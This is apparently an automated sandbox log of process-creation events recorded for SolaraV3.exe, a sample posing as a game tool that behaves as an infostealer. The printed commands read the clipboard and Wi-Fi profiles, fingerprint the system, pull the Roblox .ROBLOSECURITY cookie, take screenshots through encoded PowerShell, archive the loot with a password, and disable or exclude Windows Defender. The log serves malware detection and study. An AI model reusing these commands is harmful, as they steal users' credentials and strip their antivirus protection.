Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\reg.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAI